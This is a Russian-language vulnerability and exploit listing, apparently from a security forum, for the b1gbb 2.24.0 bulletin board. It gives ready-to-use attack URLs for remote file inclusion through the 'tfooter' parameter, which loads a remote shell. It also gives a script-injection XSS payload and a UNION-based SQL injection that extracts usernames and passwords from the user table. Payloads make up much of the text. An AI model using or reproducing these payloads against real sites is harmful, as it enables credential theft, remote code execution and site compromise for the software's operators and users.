PHP-Include
b1gbb 2.24.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "tfooter" в сценарии footer.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример:
Код:
http://[host]/path/footer.inc.php?tfooter=[file]
Межсайтовый скриптинг
b1gbb 2.24.0
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием visitenkarte.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
SQL-инъекция
b1gbb 2.24.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием showthread.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример
Код:
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20 cebb_user%20%20where%20id=1/*
XSS
Код:
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Exploite
Код:
# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities
# D.Script :
http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip
# V.Code :
include $tfooter
# In :
footer.inc.php
# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?
# Discovered by:
Rf7awy
x59@hotmail.it